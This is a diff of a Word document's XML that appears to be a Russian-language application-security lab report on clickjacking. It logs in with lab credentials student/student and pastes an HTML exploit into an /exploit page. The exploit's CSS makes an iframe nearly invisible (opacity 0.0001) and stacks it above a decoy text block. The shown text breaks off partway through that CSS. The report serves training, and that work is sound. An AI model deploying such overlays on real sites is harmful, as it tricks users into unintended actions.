--- a/AppSec/15/clickJacking.docx
+++ b/AppSec/15/clickJacking.docx
@@ -5,61 +5,390 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>&lt;style&gt;</w:t>
+        <w:ind w:left="-851"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="6518427" cy="3448050"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Рисунок 1" descr="E:\workspace\AppSec\AppSec\15\Успех.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="E:\workspace\AppSec\AppSec\15\Успех.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6524923" cy="3451486"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>    iframe {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>        position:relative;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>Открыл страницу</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>login</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>залогинился</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> под</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>student</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>student</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Перешел на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> и вставил следующий </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>эксплойт</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>style</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>position:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>relative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>width:</w:t>
@@ -67,15 +396,23 @@
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">700px;      /* </w:t>
-      </w:r>
-      <w:r>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">700px;      /* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
         <w:t>ширина</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> iframe */</w:t>
@@ -83,363 +420,1388 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>height:500</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">px;   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  /* высота </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        opacity:0.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">0001;   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   /* сначала полупрозрачно для выравнивания */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>z-index:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>border:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>div</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>position:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>absolute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>top:270</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">px;   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     /* позиция текста по вертикали */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        left:50</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">px;   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     /* позиция текста по горизонтали */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>z-index:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>font-family:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system-ui,Segoe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>UI,Roboto,Arial,sans</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-serif;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>padding:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>12px 20px;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="200" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
